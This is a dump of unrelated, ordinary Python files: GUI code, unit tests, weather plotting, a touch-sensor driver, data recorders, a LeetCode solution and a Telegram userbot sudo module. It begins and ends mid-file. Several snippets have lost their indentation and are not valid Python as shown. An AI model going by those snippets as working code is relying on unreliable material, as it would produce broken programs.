        NOTE(review): relies on the module-global MainWindow created in the
        __main__ block as the dialog parent -- confirm this is intentional.
        """
        wlPath = QtGui.QFileDialog.getOpenFileName(MainWindow,
            'Open watchlist file', 'c:\\', 'Watchlist files (*.wl)')
        print wlPath, "\n"
        with open(wlPath, "r") as wlFile:
            print wlFile.read()
# This code in the scope of this 'if statement' runs if the code is executed directly, as opposed to being imported
# in another Python script. This is where the execution of the program code begins.
if __name__ == "__main__":
    # The 'sys' module is imported to allow the program's execution to be halted once the user has
    # closed the application.
    import sys
    # The application object is defined. 'sys.argv' represents a list of parameters provided by the user
    # when executing the program from the terminal / command prompt. Our program doesn't make use of any, but it is
    # convention in PyQt programming to accept them.
    app = QtGui.QApplication(sys.argv)
    # Application icon, applied to every window of the app.
    icon = QtGui.QIcon()
    icon.addFile('images/SELogoSmall.png', QtCore.QSize(256, 256))
    app.setWindowIcon(icon)
    # A generic window object is instantiated to be used as a parameter of the 'setupUi' method of
    # the 'Ui_MainWindow' class.
    MainWindow = QtGui.QMainWindow()
    # The main / home window of the application is instantiated as 'ui', and its setup method is called
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    # The main window is displayed to the user.
    MainWindow.show()
    # When the execution of the application has been ended by the user, the script's execution stops.
    sys.exit(app.exec_())
import json
import unittest
from json import JSONDecodeError
from unittest.mock import patch, Mock
from spresso.model.base import Composition, User, JsonSchema, Origin
from spresso.utils.base import get_url
class CompositionTestCase(unittest.TestCase):
    """Unit tests for the dict-like Composition model."""

    def test_init(self):
        # A fresh Composition behaves like an empty dict.
        self.assertEqual(Composition(), {})

    def test_from_json(self):
        expected = {"key": "value"}
        composition = Composition()
        composition.from_json(json.dumps(expected))
        self.assertEqual(composition, expected)
        # Malformed input must surface as a JSONDecodeError.
        self.assertRaises(JSONDecodeError, composition.from_json, "json fail")

    def test_to_json(self):
        composition = Composition(key="value")
        self.assertEqual(composition.to_json(), json.dumps({"key": "value"}))

    def test_set_get(self):
        composition = Composition(key="value")
        self.assertEqual(composition.key, "value")
        composition.key = "test"
        self.assertEqual(composition.key, "test")
class JsonSchemaTestCase(unittest.TestCase):
    """Tests for JsonSchema with file access and validation mocked out."""

    # patch decorators apply bottom-up, so mock arguments arrive in the
    # order: json, get_resource, validate.
    @patch("spresso.model.base.validate")
    @patch("spresso.model.base.get_resource")
    @patch("spresso.model.base.json")
    def test_validate(self, json_mock, get_resource_mock, validate_mock):
        json_schema = JsonSchema()
        data = ""
        json_mock.loads.return_value = "schema"
        get_resource_mock.return_value = "resource"
        json_schema.validate(data)
        # Schema file is read via get_resource, parsed, then validated against.
        json_mock.loads.assert_called_once_with("resource")
        validate_mock.assert_called_once_with(data, "schema")

    @patch("spresso.model.base.get_resource")
    def test_get_schema(self, resource_mock):
        json_schema = JsonSchema()
        resource_mock.return_value = "schema"
        schema = json_schema.get_schema()
        # Default schema location: "resources/" with an empty file name.
        resource_mock.assert_called_once_with("resources/", "")
        self.assertEqual(schema, "schema")

    def test_str(self):
        json_schema = JsonSchema()
        self.assertEqual(str(json_schema), 'JsonSchema({})')
class OriginTestCase(unittest.TestCase):
    """Tests for Origin header validation, mocked and end-to-end."""

    @patch("spresso.model.base.get_url")
    @patch("spresso.model.base.urlparse")
    def test_origin(self, urlparse_mock, get_url_mock):
        header = "header"
        settings = Mock()
        settings.scheme = "scheme"
        settings.domain = "domain"
        origin = Origin(header, settings=settings)
        get_url_mock.return_value = "url"
        urlparse_mock.return_value = "urlparse"
        # Both header and expected URL parse to the same mock value -> valid.
        self.assertTrue(origin.valid)
        get_url_mock.assert_called_once_with("scheme", "domain")
        # urlparse is invoked once for the header and once for the expected URL.
        self.assertEqual(urlparse_mock.call_count, 2)

    def test_functional(self):
        # Real get_url/urlparse: matching scheme+host is valid ...
        scheme = "http"
        netloc = "example.com"
        url = get_url(scheme, netloc)
        settings = Mock()
        settings.scheme = scheme
        settings.domain = netloc
        origin = Origin(url, settings=settings)
        self.assertEqual(origin.expected, scheme + "://" + netloc)
        self.assertTrue(origin.valid)
        # ... while a scheme mismatch (https vs http) is rejected.
        scheme = "https"
        mismatching_url = get_url(scheme, netloc)
        origin = Origin(mismatching_url, settings=settings)
        self.assertFalse(origin.valid)
class UserTestCase(unittest.TestCase):
    """Unit tests for the User model's e-mail handling."""

    def test_netloc(self):
        user = User(None)
        self.assertIsNone(user.netloc)
        user.email = "test@test"
        # netloc is the part after the '@'.
        self.assertEqual(user.netloc, "test")

    def test_valid(self):
        user = User(None)
        self.assertFalse(user.is_valid)
        user.email = "test@test"
        self.assertTrue(user.is_valid)

    def test_basic_check(self):
        user = User("test#d@test")
        # '#' fails the basic syntax check.
        self.assertFalse(user.basic_check())
        user.email = "test@test"
        self.assertTrue(user.basic_check())
|
import ftplib
import glob
import subprocess as sp
import csv
import numpy as np
import netCDF4 as nc4
import pygrib as pg
import matplotlib.pyplot as plt
# Non-interactive backend: this runs headless on the cluster.
plt.switch_backend('agg')
import datetime
import scipy
import os
import sys
from mpl_toolkits.basemap import Basemap
from matplotlib.patches import Polygon
from matplotlib.colors import LinearSegmentedColormap
from scipy.spatial import Delaunay
from scipy.interpolate import LinearNDInterpolator
from shutil import copyfile
# Append all stdout (including the marker below) to the shared logfile.
sys.stdout = open('/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/logfile','a+')
# NOTE: Python 2 print statement -- this script targets Python 2.
print 'starting rpb'
os.chdir('/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/')
def pb(reflectivities,outname):
    """Render a 'paintball' plot: for each ensemble member, shade the cells
    where reflectivity >= 40 dBZ in that member's colour, over a CONUS map.

    reflectivities -- array-like of 2-D member fields (first axis = member);
                      assumed already on the map grid -- TODO confirm.
    outname        -- basename used for the output PNG.
    """
    plt.figure(figsize=(16,9))
    m = Basemap(projection='lcc',lat_0=5,lon_0=-100,llcrnrlon=-126,llcrnrlat=23,urcrnrlon=-63,urcrnrlat=50,resolution='h')
    shp_info = m.readshapefile('/gpfs_backup/stormtrack/jtradfor/ensemble_data/reference/st99_d00','states',drawbounds=False)
    ax = plt.gca()
    # White state fill below the data (zorder 1), black outlines above (zorder 3).
    for nshape,seg in enumerate(m.states):
        poly = Polygon(seg,facecolor='white',edgecolor='white',zorder=1,linewidth=1)
        poly2 = Polygon(seg,facecolor='none',edgecolor='black',zorder=3,linewidth=1)
        ax.add_patch(poly)
        ax.add_patch(poly2)
    # Work on a copy so the caller's array is not mutated.
    reflectivities_copy = np.copy(reflectivities)
    reflect_pb = np.zeros_like(reflectivities_copy[0])
    # Threshold each member at 40 dBZ and tag surviving cells with the
    # member index (c+1); later members win ties via the running max.
    for c,reflect_member in enumerate(reflectivities_copy):
        reflect_member[reflect_member<40] = 0
        reflect_member[reflect_member>=40] = c+1
        reflect_pb = np.max([reflect_pb,reflect_member],axis=0)
    # NaN-out empty cells and a 50-cell border so imshow leaves them blank.
    reflect_pb[reflect_pb==0] = np.nan
    reflect_pb[-50:,:] = np.nan
    reflect_pb[:50,:] = np.nan
    reflect_pb[:,:50] = np.nan
    reflect_pb[:,-50:] = np.nan
    m.imshow(reflect_pb,zorder=2,cmap='tab10',interpolation='none',vmin=1,vmax=10)
    plt.box(False)
    pbfil = '/gpfs_backup/stormtrack/jtradfor/ensemble_data/wxenviz.github.io/uploads/outimages/hrrre/' + outname + '_R_pb.png'
    plt.savefig(pbfil,facecolor='#101010',bbox_inches='tight',dpi=500)
    plt.close()
datapaths = glob.glob('/gpfs_backup/stormtrack/jtradfor/ensemble_data/rawdata/hrrre/*creflect*')
dateis = []
if len(datapaths)>0:
    # Pick the file with the highest hour field (basename chars 9-10)
    # -- presumably the most recent model cycle; confirm naming scheme.
    latest = 0
    latestpath = datapaths[0]
    for datapath in datapaths:
        if int(os.path.basename(datapath)[9:11]) > latest:
            latest = int(os.path.basename(datapath)[9:11])
            latestpath = datapath
    fil = os.path.basename(latestpath)[0:13]
    reflectivities = np.load(latestpath)
    # pb() returns None; the assignment only marks completion.
    pbsdfil = pb(reflectivities,fil)
|
from sys import exit
try:
from cap1xxx import Cap1166, PID_CAP1166
except ImportError:
exit("This library requires the cap1xxx module\nInstall with: sudo pip install cap1xxx")
I2C_ADDR = 0x2c
# Channel indices of the six capacitive pads.
UP = 1
DOWN = 2
LEFT = 3
RIGHT = 5
BUTTON = 4
CANCEL = 0
# Module-level singleton: one CAP1166 controller on the fixed I2C address.
_cap1166 = Cap1166(i2c_addr=I2C_ADDR)
_cap1166._write_byte(0x26, 0b00111111) # Force recalibration
# Decouple the on-board LEDs from touch state by default.
for x in range(6):
    _cap1166.set_led_linking(x, False)
def high_sensitivity():
    """Switch to high sensitivity mode

    This predetermined high sensitivity mode is for using
    touch through 3mm perspex or similar materials.
    """
    # NOTE(review): raw register writes -- 0x00/0x1f values per the CAP1166
    # datasheet (sensitivity control); confirm against the datasheet.
    _cap1166._write_byte(0x00, 0b11000000)
    _cap1166._write_byte(0x1f, 0b00000000)
def enable_repeat(enable):
    """Enable touch hold repeat

    If enable is true, repeat will be enabled. This will
    trigger new touch events at the set repeat_rate when
    a touch input is held.

    :param enable: enable/disable repeat: True/False
    """
    # All-channels mask when enabled, no channels when disabled.
    mask = 0b11111111 if enable else 0b00000000
    _cap1166.enable_repeat(mask)
def set_repeat_rate(rate):
    """Set hold repeat rate

    Repeat rate values are clamped to the nearest 35ms,
    values from 35 to 560 are valid.

    :param rate: time in ms from 35 to 560
    """
    # Thin delegate; clamping happens inside the cap1xxx driver.
    _cap1166.set_repeat_rate(rate)
def on(buttons, bounce=-1):
    """Handle a press of one or more buttons

    Decorator. Use with @captouch.on(UP)

    :param buttons: List, or single instance of cap touch button constant
    :param bounce: Maintained for compatibility with Dot3k joystick, unused
    """
    buttons = buttons if isinstance(buttons, list) else [buttons]

    def register(handler):
        for button in buttons:
            _cap1166.on(channel=button, event='press', handler=handler)
            _cap1166.on(channel=button, event='held', handler=handler)
        # Bug fix: return the handler so the decorated function keeps its
        # original definition instead of being rebound to None.
        return handler
    return register
def bind_defaults(menu):
    """Bind the default controls to a menu instance

    This should be used in conjunction with a menu class instance
    to bind touch inputs to the default controls.

    :param menu: object exposing up/down/left/right/select/cancel methods
    """
    # Each pad is wired to the corresponding menu navigation method.
    @on(UP)
    def handle_up(ch, evt):
        menu.up()
    @on(DOWN)
    def handle_down(ch, evt):
        menu.down()
    @on(LEFT)
    def handle_left(ch, evt):
        menu.left()
    @on(RIGHT)
    def handle_right(ch, evt):
        menu.right()
    @on(BUTTON)
    def handle_button(ch, evt):
        menu.select()
    @on(CANCEL)
    def handle_cancel(ch, evt):
        menu.cancel()
|
#!/usr/bin/env python3
import numpy as np
import matplotlib
# Force matplotlib to not use any X Windows backend (must be called befor importing pyplot)
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def plotDataPoints(X, idx, K, i):
    #PLOTDATAPOINTS plots data points in X, coloring them so that those with the same
    #index assignments in idx have the same color
    #   PLOTDATAPOINTS(X, idx, K) plots data points in X, coloring them so that those
    #   with the same index assignments in idx have the same color
    # NOTE(review): K is unused here; idx[i] suggests idx holds one assignment
    # vector per iteration, selected by i -- confirm against the caller.
    # Create palette
    cmap = plt.cm.rainbow
    # Plot the data (colour = cluster index, mapped through the palette)
    plt.scatter(X[:, 0], X[:, 1], c=np.array(idx[i]), cmap=cmap, marker='o', s=8**2, lw=1)
    #end
|
import typing as t
import logging
from typing import TYPE_CHECKING
logger = logging.getLogger("bentoml.tests")
if TYPE_CHECKING:
from aiohttp.typedefs import LooseHeaders
from starlette.datastructures import Headers
from starlette.datastructures import FormData
async def parse_multipart_form(headers: "Headers", body: bytes) -> "FormData":
    """Parse *body* as a multipart form using starlette's MultiPartParser."""
    from starlette.formparsers import MultiPartParser

    async def _stream(payload: bytes) -> t.AsyncGenerator[bytes, None]:
        # MultiPartParser consumes an async byte stream; yield the whole
        # payload, then an empty chunk to signal end-of-stream.
        yield payload
        yield b""

    parser = MultiPartParser(headers=headers, stream=_stream(body))
    return await parser.parse()
async def async_request(
    method: str,
    url: str,
    headers: t.Union[None, t.Tuple[t.Tuple[str, str], ...], "LooseHeaders"] = None,
    data: t.Any = None,
    timeout: t.Optional[int] = None,
    assert_status: t.Union[int, t.Callable[[int], bool], None] = None,
    assert_data: t.Union[bytes, t.Callable[[bytes], bool], None] = None,
    assert_headers: t.Optional[t.Callable[[t.Any], bool]] = None,
) -> t.Tuple[int, "Headers", bytes]:
    """
    raw async request client

    Performs one HTTP request via aiohttp and optionally asserts on the
    response status, body and headers (each check accepts either an
    expected value or a predicate). Returns (status, headers, body).
    """
    import aiohttp
    from starlette.datastructures import Headers

    async with aiohttp.ClientSession() as sess:
        async with sess.request(
            method, url, data=data, headers=headers, timeout=timeout
        ) as r:
            # Read the body before leaving the context manager.
            r_body = await r.read()

    if assert_status is not None:
        if callable(assert_status):
            assert assert_status(r.status), f"{r.status} {repr(r_body)}"
        else:
            assert r.status == assert_status, f"{r.status} {repr(r_body)}"

    if assert_data is not None:
        if callable(assert_data):
            assert assert_data(r_body), r_body
        else:
            assert r_body == assert_data, r_body

    if assert_headers is not None:
        assert assert_headers(r.headers), repr(r.headers)

    # Normalise aiohttp's header object into starlette Headers for callers.
    headers = t.cast(t.Mapping[str, str], r.headers)
    return r.status, Headers(headers), r_body
|
from argparse import ArgumentParser
from . import __version__
# Top-level CLI definition for the SQLite3 shell.
parser = ArgumentParser(
    prog="sqlite3_shell",
    description="Python SQLite3 shell"
)
parser.add_argument(
    "--version", action="version", version=f"sqlite3-shell {__version__}"
)
parser.add_argument(
    "database", default=":memory:", nargs="?",
    help="database file to connect to; by default a temporary in-memory one"
)
parser.add_argument(
    "-i", "--init", metavar="file",
    help="file with SQL code to run before interactive input is opened. "
)
parser.add_argument(
    "-v", "--verbosity", default="none",
    choices=["debug", "info", "warning", "error", "critical", "none"],
    help="logging level. only messages at and above that level will be logged"
)
# Output-formatting options live in their own argument group.
formatGroup = parser.add_argument_group(
    "Formatting options",
    description="Options for formatting output"
)
formatGroup.add_argument(
    "-f", "--format",
    choices=["csv", "html", "json"],
    help="format to output data in"
)
formatGroup.add_argument(
    "--headers", action="store_true",
    help="whether or not to include table headings in output"
)
formatGroup.add_argument(
    "-s", "--sep", default="|", metavar="separator",
    help="string to use to separate cells in default output mode; default '|'"
)
formatGroup.add_argument(
    "-p", "--pretty", action="store_true",
    help="whether to prettify output"
)
formatGroup.add_argument(
    "-be", "--blob-encoding", default="hex",
    choices=["base64", "base85", "hex", "raw"],
    help="encoding to output blobs in"
)
formatGroup.add_argument(
    "-bf", "--blob-format", default="BLOB:{}",
    help="format to output blobs in. .format will be called with the encoded blob. " \
         "default 'BLOB:{}'"
)
formatGroup.add_argument(
    "-n", "--null-value", default="NULL",
    help="string representation of NULL, default 'NULL'"
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import dash_core_components as dcc
import dash_html_components as html
from utilities.models import *
from honeycomb import *
@db_session
def load_statistics(statistic):
    """This function takes a string as parameter and returns a certain value, which is then displayed in the statistics
    bar on the content-block settings page.

    statistic -- one of 'total', 'urltype', 'keywordtype'; any other value
    falls through and implicitly returns None.
    """
    # Pony ORM generator queries over the Block entity; only active rules count.
    if statistic == 'total':
        return select(p for p in Block if p.active).count()
    elif statistic == 'urltype':
        return select(p for p in Block if p.type == 'Url' and p.active).count()
    elif statistic == 'keywordtype':
        return select(p for p in Block if p.type == 'Keyword' and p.active).count()
# Creating a dataframe and filling it with one row: No data loaded.
# NOTE(review): `pd` (and `dt` used below) are not imported in this module
# directly -- presumably supplied by the star imports above; confirm.
df = pd.DataFrame(columns=['Type',
                           'Value',
                           'Status'])
df = df.append({'Type': 'No data loaded'}, ignore_index=True)
# Defining the lay-out of this page.
layout = html.Div([
html.H3('Content Block Settings',
style={'text-align': 'center'}),
html.P('''On this page, the content block settings for HIVE can be set.
Blocked content will not be stored in the database and will simply be ignored.
The statistics are refreshed every 30 seconds. Read the User Guide before using this feature.''',
style={'width': 380,
'marginLeft': 'auto',
'marginRight': 'auto',
'textAlign': 'center',
'marginBottom': 10}),
html.Div([
html.Div([
html.Div(children=load_statistics('total'),
id='BlockStatisticsBox1',
className='statisticsBox'),
html.Div(children='Total',
className='title'),
html.Div(children='Amount of active rules in the database',
className='description')
], className='statisticsWrapper'),
html.Div([
html.Div(children=load_statistics('urltype'),
className='statisticsBox',
id='BlockStatisticsBox2'),
html.Div(children='URL',
className='title'),
html.Div(children='Amount of active URL rules',
className='description')
], className='statisticsWrapper'),
html.Div([
html.Div(children=load_statistics('keywordtype'),
className='statisticsBox',
id='BlockStatisticsBox3'),
html.Div(children='Keyword',
className='title'),
html.Div(children='Amount of active Keyword rules',
className='description')
], className='statisticsWrapper'),
html.Button('Refresh statistics',
id='refresh-block-statistics',
className='refresh_button')
], className='statisticsRow'),
html.Div([
dcc.Input(id='block-input-box',
type='text',
style={'width': 480},
placeholder='String-match which needs to be blocked'),
dcc.RadioItems(
id='block-category',
options=[
{'label': 'Keyword',
'value': 'Keyword'},
{'label': 'URL',
'value': 'Url'}
],
value='Keyword',
labelStyle={'display': 'inline-block'}),
html.Button('Submit',
id='blocksubmit',
style={'marginLeft': 20}),
html.Button('Load table',
id='reload-button',
style={'marginLeft': 20,
'float': 'right'}),
html.Br(),
html.Br(),
html.Div(id='output-container-block')
]),
html.Br(),
html.Div(
dt.DataTable(
rows=df.to_dict('records'),
sortable=True,
row_selectable=True,
filterable=True,
selected_row_indices=[],
id='block-table')
),
html.Button('Set active',
id='block_set_active',
style={'marginTop': 20,
'float': 'left'}),
html.Div(id='block_activate_warning'),
html.Button('Set inactive',
id='block_set_inactive',
style={'marginTop': 20,
'marginLeft': 20,
'float': 'left'}),
html.Div(id='block_inactivate_warning')
], style={'paddingBottom': 55})
|
# -*- coding: utf-8 -*-
import pandas as pd
from zvt.api.data_type import Region, Provider, EntityType
from zvt.domain import Stock, StockDetail
from zvt.recorders.consts import YAHOO_STOCK_LIST_HEADER
from zvt.contract.recorder import RecorderForEntities
from zvt.contract.api import df_to_db
from zvt.networking.request import sync_get
from zvt.utils.time_utils import to_pd_timestamp
class ExchangeUsStockListRecorder(RecorderForEntities):
    """Fetch the US stock lists (NYSE / NASDAQ / AMEX) from the Nasdaq
    screener API and persist them to the Stock and StockDetail schemas."""

    region = Region.CHN
    provider = Provider.Exchange
    data_schema = Stock

    def init_entities(self):
        # One recorder pass per exchange.
        self.entities = ['nyse', 'nasdaq', 'amex']

    def generate_domain_id(self, entity, df):
        """Build the unique id column: <entity_type>_<exchange>_<code>."""
        return df['entity_type'] + '_' + df['exchange'] + '_' + df['code']

    def get_original_time_field(self):
        return 'list_date'

    def process_loop(self, entity, http_session):
        """Download the screener rows for one exchange and persist them."""
        url = 'https://api.nasdaq.com/api/screener/stocks'
        params = {'download': 'true', 'exchange': entity}
        resp = sync_get(http_session, url, headers=YAHOO_STOCK_LIST_HEADER, params=params, enable_proxy=False)
        if resp is None:
            return
        # Renamed from `json` to avoid shadowing the conventional module name.
        rows = resp.json()['data']['rows']
        if len(rows) > 0:
            df = self.format(content=rows, exchange=entity)
            self.persist(df)
        return None

    def format(self, content, exchange):
        """Normalise raw screener rows into the Stock schema columns."""
        df = pd.DataFrame(content)
        if df is not None:
            df.rename(columns={'symbol': 'code', 'ipoyear': 'list_date', 'marketCap': 'market_cap'}, inplace=True)
            timestamp_str = self.get_original_time_field()
            # Unknown listing years default to 1980.
            df.fillna({timestamp_str: '1980'}, inplace=True)
            df[timestamp_str] = df[timestamp_str].apply(lambda x: to_pd_timestamp(x))
            df['entity_type'] = EntityType.Stock.value
            df['exchange'] = exchange
            df['code'] = df['code'].str.strip()
            df['id'] = self.generate_domain_id(exchange, df)
            df['entity_id'] = df['id']
            # subset as an explicit list (was a string in parentheses).
            df.drop_duplicates(subset=['id'], keep='last', inplace=True)
        return df

    def persist(self, df):
        # persist to Stock
        df_to_db(df=df, ref_df=None, region=Region.US, data_schema=self.data_schema, provider=self.provider, force_update=True)
        # persist to StockDetail
        df_to_db(df=df, ref_df=None, region=Region.US, data_schema=StockDetail, provider=self.provider, force_update=True)

    def on_finish(self):
        # Fixed typo in the log message ("successs").
        self.logger.info("persist stock list success")
__all__ = ['ExchangeUsStockListRecorder']
if __name__ == '__main__':
    # Manual run: record the full US stock list once.
    spider = ExchangeUsStockListRecorder()
    spider.run()
|
#!/usr/bin/env python
import tamasis as tm
import csh
import csh.score
import numpy as np
import lo
import scipy.sparse.linalg as spl
# data
pacs = tm.PacsObservation(filename=tm.tamasis_dir+'tests/frames_blue.fits',
                          fine_sampling_factor=1, keep_bad_detectors=True)
tod = pacs.get_tod()
# compression model: 3-D binning with factor 2 along each axis
#C = lo.binning(tod.shape, factor=8, axis=1, dtype=np.float64)
shape = (64, 32) + (tod.shape[1], )
C = csh.binning3d( shape, factors=(2, 2, 2))
# compress data
ctod = C * tod.flatten()
# projector (map <-> timeline operator)
projection = tm.Projection(pacs, resolution=3.2, oversampling=False,
                           npixels_per_sample=6)
model = projection
# naive map: simple back-projection of the timeline
backmap = model.transpose(tod)
# transform to lo (linear-operator wrapper around the acquisition model)
#P = lo.ndsubclass(backmap, tod, matvec=model.direct, rmatvec=model.transpose)
P = lo.aslinearoperator(model.aslinearoperator())
# full model: compression applied after projection
A = C * P
# priors: finite-difference smoothness along both map axes
Dx = lo.diff(backmap.shape, axis=0, dtype=np.float64)
Dy = lo.diff(backmap.shape, axis=1, dtype=np.float64)
#Dw = lo.pywt_lo.wavedec2(backmap.shape, "haar")
# inversion: regularized least squares with both priors
y = ctod.flatten()
x, conv = lo.rls(A, (Dx, Dy), (1e1, 1e1), y)
# NOTE(review): backmap.zeros presumably comes from the tamasis Map API --
# allocates a zero map with the same metadata; confirm.
sol = backmap.zeros(backmap.shape)
sol[:] = x.reshape(sol.shape)
# L2 score of the compression strategy (dense normal matrix)
Md = (A.T * A).todense()
bin_score = csh.score.score(Md)
print("score of binning3d strategy " + str(bin_score))
|
import matplotlib.gridspec
import matplotlib.pyplot as plt
import numpy as np
from predicu.data import CUM_COLUMNS
from predicu.plot import COLUMN_TO_HUMAN_READABLE
data_source = ["bedcounts"]
def plot(data):
n_rows = (len(CUM_COLUMNS) + len(CUM_COLUMNS) % 2) // 2
fig = plt.figure(figsize=(n_rows * 5, 10))
gs = matplotlib.gridspec.GridSpec(n_rows, 2)
ax0 = None
for i, col in enumerate(CUM_COLUMNS):
ax = fig.add_subplot(gs[i // 2, i % 2], sharex=ax0)
if ax0 is None:
ax0 = ax
for g, d in data.groupby("department"):
d = d.groupby("date")[col].sum().sort_index()
ax.plot(np.arange(d.values.shape[0]), d.values, label=g)
ax.set_title(COLUMN_TO_HUMAN_READABLE[col])
dates = np.array(sorted(data.date.unique().flatten()))
xticks = np.arange(0, len(dates), 3)
ax.set_xticks(xticks)
ax.set_xticklabels(
[date.strftime("%d-%m") for date in dates[xticks]], rotation=45,
)
ax0.legend(ncol=2, loc="upper left", frameon=True, fontsize="xx-small")
fig.tight_layout()
fig.subplots_adjust(hspace=0.2)
tikzplotlib_kwargs = dict(
extra_groupstyle_parameters={
r"horizontal sep=0.2cm",
r"vertical sep=3cm",
}
)
return fig, tikzplotlib_kwargs
|
from setuptools import setup, find_packages
# Packaging metadata for the backstabbr scraper API and its Discord bot.
# NOTE(review): find_packages is imported but the package list is explicit.
setup(name='backstabbr_api',
      version='1.0.2',
      description='Web-scraper API and Discord Bot for the online diplomacy program Backstabbr',
      url='https://github.com/afkhurana/backstabbr_api',
      author='Arjun Khurana',
      author_email='afkhurana@gmail.com',
      license='MIT',
      packages=['backstabbr_api', 'backstabbr_bot'],
      install_requires=["discord.py", "html5print", "requests"])
|
"""
今天,书店老板有一家店打算试营业 customers.length 分钟。每分钟都有一些顾客(customers[i])会进入书店,所有这些顾客都会在那一分钟结束后离开。
在某些时候,书店老板会生气。 如果书店老板在第 i 分钟生气,那么 grumpy[i] = 1,否则 grumpy[i] = 0。 当书店老板生气时,那一分钟的顾客就会不满意,不生气则他们是满意的。
书店老板知道一个秘密技巧,能抑制自己的情绪,可以让自己连续 X 分钟不生气,但却只能使用一次。
请你返回这一天营业下来,最多有多少客户能够感到满意的数量。
示例:
输入:customers = [1,0,1,2,1,1,7,5], grumpy = [0,1,0,1,0,1,0,1], X = 3
输出:16
解释:
书店老板在最后 3 分钟保持冷静。
感到满意的最大客户数量 = 1 + 1 + 1 + 1 + 7 + 5 = 16.
提示:
1 <= X <= customers.length == grumpy.length <= 20000
0 <= customers[i] <= 1000
0 <= grumpy[i] <= 1
"""
from typing import List
class Solution:
    def maxSatisfied(self, customers: List[int], grumpy: List[int], X: int) -> int:
        """LeetCode 1052: maximise satisfied customers.

        Sliding window: customers during non-grumpy minutes are always
        satisfied (base); the X-minute calm window additionally recovers
        the grumpy-minute customers it covers, so take the window with
        the largest recoverable sum.
        """
        # Customers who are satisfied regardless of the technique.
        base = sum(c for c, g in zip(customers, grumpy) if g == 0)
        # Recoverable customers inside the initial window [0, X).
        window = sum(c for c, g in zip(customers[:X], grumpy[:X]) if g == 1)
        best = window
        # Slide the window one minute at a time and track the maximum.
        for i in range(X, len(customers)):
            if grumpy[i] == 1:
                window += customers[i]
            if grumpy[i - X] == 1:
                window -= customers[i - X]
            best = max(best, window)
        return base + best
if __name__=='__main__':
    s = Solution()
    # Sample case from the problem statement.
    assert s.maxSatisfied([1,0,1,2,1,1,7,5],[0,1,0,1,0,1,0,1],3) == 16
"""The STOMP command and header name strings.
"""
HDR_ACCEPT_VERSION = 'accept-version'
HDR_ACK = 'ack'
HDR_CONTENT_LENGTH = 'content-length'
HDR_CONTENT_TYPE = 'content-type'
HDR_DESTINATION = 'destination'
HDR_HEARTBEAT = 'heart-beat'
HDR_HOST = 'host'
HDR_ID = 'id'
HDR_MESSAGE_ID = 'message-id'
HDR_LOGIN = 'login'
HDR_PASSCODE = 'passcode'
HDR_RECEIPT = 'receipt'
HDR_SUBSCRIPTION = 'subscription'
HDR_TRANSACTION = 'transaction'
CMD_ABORT = 'ABORT'
CMD_ACK = 'ACK'
CMD_BEGIN = 'BEGIN'
CMD_COMMIT = 'COMMIT'
CMD_CONNECT = 'CONNECT'
CMD_DISCONNECT = 'DISCONNECT'
CMD_NACK = 'NACK'
CMD_STOMP = 'STOMP'
CMD_SEND = 'SEND'
CMD_SUBSCRIBE = 'SUBSCRIBE'
CMD_UNSUBSCRIBE = 'UNSUBSCRIBE'
|
#!/usr/bin/env python
"""
convnet/prep.py
Grabs the first two classes of CIFAR10 and saves them as numpy arrays
Since we don't assume everyone has access to GPUs, we do this to create
a dataset that can be trained in a reasonable amount of time on a CPU.
"""
import os
import sys
import numpy as np
import torch
from torchvision import transforms, datasets
if __name__ == "__main__":
# --
# Load data
print('prep.py: dowloading cifar10', file=sys.stderr)
trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=transforms.ToTensor())
testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=transforms.ToTensor())
X_train, y_train = zip(*[(x, y) for x, y in trainset if y <= 1])
X_test, y_test = zip(*[(x, y) for x, y in testset if y <= 1])
X_train = np.array(torch.stack(X_train)).astype(np.float32)
X_test = np.array(torch.stack(X_test)).astype(np.float32)
y_train = np.array(y_train).astype(np.int64)
y_test = np.array(y_test).astype(np.int64)
# --
# Scale and center data
X_mean = X_train.transpose(1, 0, 2, 3).reshape(3, -1).mean(axis=-1).reshape(1, 3, 1, 1)
X_std = X_train.transpose(1, 0, 2, 3).reshape(3, -1).std(axis=-1).reshape(1, 3, 1, 1)
X_train = (X_train - X_mean) / X_std
X_test = (X_test - X_mean) / X_std
# --
# Save to file
os.makedirs('data/cifar2', exist_ok=True)
print('prep.py: saving to data/cifar2', file=sys.stderr)
np.save('data/cifar2/X_train.npy', X_train)
np.save('data/cifar2/X_test.npy', X_test)
np.save('data/cifar2/y_train.npy', y_train)
np.save('data/cifar2/y_test.npy', y_test)
|
from pyrogram import filters
from pyrogram.types import Message
from wbb import BOT_ID, SUDOERS, USERBOT_PREFIX, app2
from wbb.core.decorators.errors import capture_err
from wbb.modules.userbot import edit_or_reply
from wbb.utils.dbfunctions import add_sudo, get_sudoers, remove_sudo
from wbb.utils.functions import restart
__MODULE__ = "Sudo"
__HELP__ = """
**MODULI HII NI KWA AJILI YA DEVELOPERS TU**
.useradd - Kuongeza Mtumiaji Katika Sudoers.
.userdel - Kutoa Mtumiaji Katika Sudoers
.sudoers - Kuorodhesha Watumiaji wa Sudo.
**NOTE:**
Wala msiongezee mwenye kufuru, isipo kuwa kwa kuamini.
watumiaji wa sudo wanaweza kufanya chochote na akaunti yako,
inaweza hata kufuta akaunti yako.
"""
@app2.on_message(
    filters.command("useradd", prefixes=USERBOT_PREFIX)
    & filters.user(SUDOERS)
)
@capture_err
async def useradd(_, message: Message):
    """Promote the replied-to user to the sudoers list, then restart the bot."""
    replied = message.reply_to_message
    if not replied:
        return await edit_or_reply(
            message,
            text="Jibu ujumbe wa mtu wa kumongeza kwa sudoer.",
        )
    target_id = replied.from_user.id
    # Reject duplicates and attempts to promote the assistant bot itself.
    if target_id in await get_sudoers():
        return await edit_or_reply(
            message, text="Mtumiaji tayari yuko katika sudoer."
        )
    if target_id == BOT_ID:
        return await edit_or_reply(
            message, text="Huwezi kuongeza bot msaidizi katika sudoers."
        )
    if await add_sudo(target_id):
        await edit_or_reply(
            message,
            text="Imefanikiwa kuongeza mtumiaji katika sudoers, Bot itaanzishwa upya sasa.",
        )
        return await restart(None)
    await edit_or_reply(
        message, text="Kitu kibaya kilitokea, angalia logs."
    )
@app2.on_message(
    filters.command("userdel", prefixes=USERBOT_PREFIX)
    & filters.user(SUDOERS)
)
